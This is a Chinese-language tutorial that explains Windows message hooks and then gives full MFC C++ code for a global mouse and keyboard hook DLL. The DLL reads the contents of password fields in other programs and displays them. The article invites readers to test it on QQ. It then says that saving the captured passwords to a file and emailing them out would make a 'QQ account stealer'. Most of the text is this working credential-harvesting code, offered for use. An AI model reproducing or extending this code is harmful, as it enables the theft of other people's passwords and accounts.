利用鼠標鍵盤鉤子截獲密碼

時間:2022-11-17 10:27:00

導語:利用鼠標鍵盤鉤子截獲密碼一文來源于網友上傳,不代表本站觀點,若需要原創文章可咨詢客服老師,歡迎參考。

利用鼠標鍵盤鉤子截獲密碼

鉤子截獲系統并得理發送給其它應用程序的消息,能完成一般程序無法完成的功能。掌握鉤子的編程方法是很有必要的

鉤子分類:

1、WH_CALLWNDPROC和WH_CALLWNDPROCRET:使你可以監視發送到窗口過程的消息

3、WH_DEBUG調試鉤子

4、WH_FOREGROUNDIDLE當當應用程序的前臺線程大概要變成空閑狀態時,系統就會調用WH_FOREGROUNDIDL

5、WH_JOURNALRECORD監視和記錄輸入事件

6、WH_JOURNALPLAYBACK回放用WH_JOURNALRECORD記錄事件

7、WH_KEYBOARD鍵盤鉤子

9、WH_KEYBOARD_LL低層鍵盤鉤子

10、WH_MOUSE鼠標鉤子

11、WH_MOUSE_LL底層鼠標鉤子

12、WH_SHELL外殼鉤子

13、WH_MSGFILTER和WH_SYSMSGFILTER使我們可以監視菜單,滾動條,消息框等

安裝鉤子:

調用函數SetWindowsHookEx安裝鉤子。其函數原型為:

HHOOKSetWindowsHookEx(intidHook,HOOKPROClpfn,INSTANCEhMod,DWORDdwThreadId)

idHook表示鉤子類型,它是和鉤子函數類型一一對應的。如,WH_KEYBOARD,WH_MOUSE。

Lpfn是鉤子函數的地址。

HMod是鉤子函數所在的實例的句柄。對于線程鉤子,該參數為NULL;對于系統鉤子,該參數為鉤子函數所在的DLL句柄。(系統鉤子必須在DLL中)

dwThreadId指定鉤子所監視的線程的線程號。對于全局鉤子,該參數為NULL。

SetWindowsHookEx返回所安裝的鉤子句柄。

卸載鉤子

調用函數BOOLUnhookWindowsHookEx(HHOOKhhk)卸載鉤子

定義鉤子函數

鉤子函數是一種特殊的回調函數。鉤子監視的特定事件發生后,系統會調用鉤子函數進行處理。一般為下:

LRESULTWINAPIMyHookProc(intnCode,WPARAMwParam,LPARAMlParam)

參數wParam和lParam包含所鉤消息的信息,比如鼠標位置、狀態,鍵盤按鍵等。nCode包含有關消息本身的信,比如是否從消息隊列中移出。

實例:

下面我們通過安裝鼠標鉤子。和鍵盤鉤子還截獲輸入的密碼,并可查看*密碼為例,來說明何何使用鉤子。

1,進入向導,新建MFCAppWizard(dll)取名為GetPass,選擇MFCExtensionDLL,完成。

2,新建一個CGetPassHook類,基類:CObject,并加入StartHook,StopHook,函數,如下:

classAFX_EXT_CLASSCGetPassHook:publicCObject

{

public:

BOOLStopHook();

BOOLStartHook(HWNDhwnd);

CGetPassHook();

virtual~CGetPassHook();

};

3:加入全局共享數據,如下:

#pragmadata_seg("ShareData")

HHOOKhKeyBoardHook=NULL;file://keyboarhook

HHOOKhMouseHook=NULL;file://mousehook

HINSTANCEglhInstance=NULL;file://globleinstance

HWNDhOutPutWnd=NULL;file://DisplayPassWnd

#pragmadata_seg()

4:加入鼠標,鍵盤鉤子處理函數,如下:

LRESULTWINAPIMouseHookProc(intnCode,WPARAMwParam,LPARAMlParam)

{file://鼠標鉤子得理函數

LPMOUSEHOOKSTRUCTlpMouse=(MOUSEHOOKSTRUCTFAR*)lParam;

if(nCode>=0)

{

HWNDhTargetHwnd=lpMouse->hwnd;file://得到鼠標所在窗口句柄

if(hTargetHwnd)

{

LONGstyle=::GetWindowLong(hTargetHwnd,GWL_STYLE);file://得到它的樣式

if(style&ES_PASSWORD)file://如果是密碼框

{

charszPass[255];

::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);

file://得到密碼

::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);

file://顯示密碼

}

}

}

returnCallNextHookEx(hMouseHook,nCode,wParam,lParam);

file://加上這句,就可以繼續傳遞消息,如果沒有,則會取消此消息的傳遞,

file://可以起到截兒消息的目的,我們這里調用之。

}

LRESULTWINAPIKeyBoardProc(intnCode,WPARAMwParam,LPARAMlParam)

{file://keyboardhookproc

if(nCode>=0)

{

HWNDhTargetHwnd=GetActiveWindow();file://getactivewindow

if(hTargetHwnd)

EnumChildWindows(hTargetHwnd,EnumWndProc,0);file://枚舉所有窗口

}

returnCallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);

file://加上這句,就可以繼續傳遞消息,如果沒有,則會取消此消息的傳遞,

file://可以起到截兒消息的目的,我們這里調用之。

}

這里要介紹下EnumChildWindows函數,原形如下:

BOOLEnumChildWindows(HWNDhWndParent,WINDENUMPROClpEnumFunc,LPARAMlParam);

hWndParent:為枚舉窗口的句柄

lpEnumFunc:枚舉函數的地址,

lParam:這里為0

5:加入枚舉窗口的函數。如下:(注意,因為前面的函數據要用到此函數,所以要么在前面聲明,要么放在上面函數之前定義。

BOOLWINAPIEnumWndProc(HWNDhwnd,LPARAMlParam)

{file://enumthechildwindow,findpassedit

if(hwnd)

{

LONGstyle=::GetWindowLong(hwnd,GWL_STYLE);file://得到STYLE

if(style&ES_PASSWORD)file://是密碼框

{

charszPass[255];

::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass);file://得到PASS

::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);file://顯示

returnTRUE;

}

}

returnTRUE;

}

6:在DEF文件中定義段屬性:(這步很重要)

SECTIONS

mydataREADWRITESHARED

7:完成StartHook,StopHook函數,啟動/關閉鉤子,如下:

BOOLCGetPassHook::StartHook(HWNDhwnd)

{file://installhoook

hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);

file://mousehook

hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);

file://keyboardhook

if(hMouseHook&&hKeyBoardHook)

{

hOutPutWnd=hwnd;file://顯示密碼的句柄

returnTRUE;

}

returnFALSE;

}

BOOLCGetPassHook::StopHook()

{file://unstallhook

BOOLmHook=UnhookWindowsHookEx(hMouseHook);

BOOLkHook=UnhookWindowsHookEx(hKeyBoardHook);

if(mHook&&kHook)

returnTRUE;

returnFALSE;

}

8:在DLLMAIN函數中得到DLL句柄,要用到glhInstance變量,因此要加入一句,如下:

externHINSTANCEglhInstance;file://記得這里

extern"C"intAPIENTRY

DllMain(HINSTANCEhInstance,DWORDdwReason,LPVOIDlpReserved)

{

UNREFERENCED_PARAMETER(lpReserved);

if(dwReason==DLL_PROCESS_ATTACH)

{

TRACE0("GETPASS.DLLInitializing!\n");

if(!AfxInitExtensionModule(GetPassDLL,hInstance))

return0;

newCDynLinkLibrary(GetPassDLL);

glhInstance=hInstance;file://得到句柄

}

elseif(dwReason==DLL_PROCESS_DETACH)

{

TRACE0("GETPASS.DLLTerminating!\n");

AfxTermExtensionModule(GetPassDLL);

}

return1;//ok

}

9:編譯,完成DLL部分,

下面建立APP部分。如下:

1:新建MFCAppWizard(exe)命名為GetPassWord,并在第一步中選擇AddtoCurrentWorkSpace加入到當前工作區,這樣方便。

2:將剛才的DLL中的GetPass.lib,和GetPassHook.h拷貝APP所在目錄,然后Project->AddtoProject-->Files

選擇這兩個文件。

2:在主對話框中,加入一個EDIT,ID為IDC_EDIT_PASS

3:在CGetPassWordDlg.h中包含GetPassHook.h文件,聲明一個對象。如下:

#include"GetPassHook.h"

classCGetPassWordDlg:publicCDialog

{

protected:

CGetPassHookm_hook;

。。。

DECLARE_MESSAGE_MAP()

};

4:在實現文件中:OnInitDialog()中起動HOOK

BOOLCGetPassWordDlg::OnInitDialog()

{

CWnd*pWnd=GetDlgItem(IDC_EDIT_PASS);

m_hook.StartHook(pWnd->GetSafeHwnd());file://installhook

returnTRUE;//returnTRUEunlessyousetthefocustoacontrol

}

5:加入WM_DESTROY消息,在退出程序時停止HOOK,如下:

voidCGetPassWordDlg::OnDestroy()

{

CDialog::OnDestroy();

m_hook.StopHook();file://stophook

}

6:將GetPass.dll拷貝到。EXE一個目錄下,

7:編譯,運行.

這樣,你在輸入任何密碼框輸入密碼時,密碼都將截獲。就算鍵盤HOOK失效,移動鼠標到密碼框,也都獲取*號密碼,因為我們安裝兩個HOOK。啟動QQ,輸入密碼,試下看是否已經截獲了密碼?將本程序稍做修改,將截獲的密碼輸出到文件,并加入發送郵件攻能,一個QQ盜號器就做成了。